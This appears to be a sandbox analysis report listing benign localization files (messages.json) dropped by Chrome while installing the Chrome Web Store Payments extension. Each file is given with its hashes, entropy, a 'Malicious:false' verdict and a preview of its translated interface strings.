                                                                                                                                                                SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):835
                                                                                                                                                                Entropy (8bit):4.791154467711985
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                                                                                                                                MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                                SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                                SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                                SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):618
                                                                                                                                                                Entropy (8bit):4.56999230891419
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                                                                                                                                MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                                SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                                SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                                SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):683
                                                                                                                                                                Entropy (8bit):4.675370843321512
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                                                                                                                                MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                                SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                                SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                                SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):604
                                                                                                                                                                Entropy (8bit):4.465685261172395
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                                                                                                                                MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                                SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                                SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                                SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):603
                                                                                                                                                                Entropy (8bit):4.479418964635223
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                                                                                                                                MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                                SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                                SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                                SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):697
                                                                                                                                                                Entropy (8bit):5.20469020877498
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                                                                                                                                MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                                SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                                SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                                SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):631
                                                                                                                                                                Entropy (8bit):5.160315577642469
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                                                                                                                                MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                                SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                                                                                                                                SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                                SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):665
                                                                                                                                                                Entropy (8bit):4.66839186029557
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                                                                                                                                MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                                SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                                                                                                                                SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                                SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):671
                                                                                                                                                                Entropy (8bit):4.631774066483956
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                                                                                                                                MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                                SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                                SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                                SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):501
                                                                                                                                                                Entropy (8bit):4.804937629013952
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YGGYpB928UZjdyE9iDCiop8682fURHWO/NrnLAOK:YHYpXK/iOiop8NFHWOFvAOK
                                                                                                                                                                MD5:8F0168B9A546D5A99FD8A262C975C80E
                                                                                                                                                                SHA1:B0718071BD0B7251D4459E9C87DF50C14622FBD6
                                                                                                                                                                SHA-256:F03FA7384DF79EBA6E0274D570996030F595A3BF6B781929DD9DB6593262E41F
                                                                                                                                                                SHA-512:A1191CDC496DDD7470BDCFAF186BB9488767159E0CA6A6242D195FA3351704DC8F8BBD03DBEE57D37BBD897C9E8D14B7325FB37D58AC80DEC0F972FF893758B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"craw_app_unavailable":{"message":"Appen er utilgjengelig for \u00f8yeblikket."},"craw_connect_to_network":{"message":"Du m\u00e5 koble til et nettverk."},"app_name":{"message":"Chrome Nettmarked-betalinger"},"app_description":{"message":"Chrome Nettmarked-betalinger"},"iap_unavailable":{"message":"Betaling i app er ikke tilgjengelig for \u00f8yeblikket."},"please_sign_in":{"message":"Du m\u00e5 logge p\u00e5 Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):615
                                                                                                                                                                Entropy (8bit):4.4715318546237315
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                                                                                                                                MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                                SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                                SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                                SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):636
                                                                                                                                                                Entropy (8bit):4.646901997539488
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                                                                                                                                MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                                SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                                SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                                SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\pt_BR\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):636
                                                                                                                                                                Entropy (8bit):4.515158874306633
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                                                                                                                                MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                                SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                                SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                                SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\pt_PT\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):622
                                                                                                                                                                Entropy (8bit):4.526171498622949
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
                                                                                                                                                                MD5:750A4800EDB93FBE56495963F9FB3B94
                                                                                                                                                                SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                                                                                                                                SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                                                                                                                                SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):641
                                                                                                                                                                Entropy (8bit):4.61125938671415
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
                                                                                                                                                                MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                                                                                                                                SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                                                                                                                                SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                                                                                                                                SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):744
                                                                                                                                                                Entropy (8bit):4.918620852166656
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
                                                                                                                                                                MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                                                                                                                                SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                                                                                                                                SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                                                                                                                                SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):4.640777810668463
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
                                                                                                                                                                MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                                                                                                                                SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                                                                                                                                SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                                                                                                                                SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                                                                                                                                Malicious:false
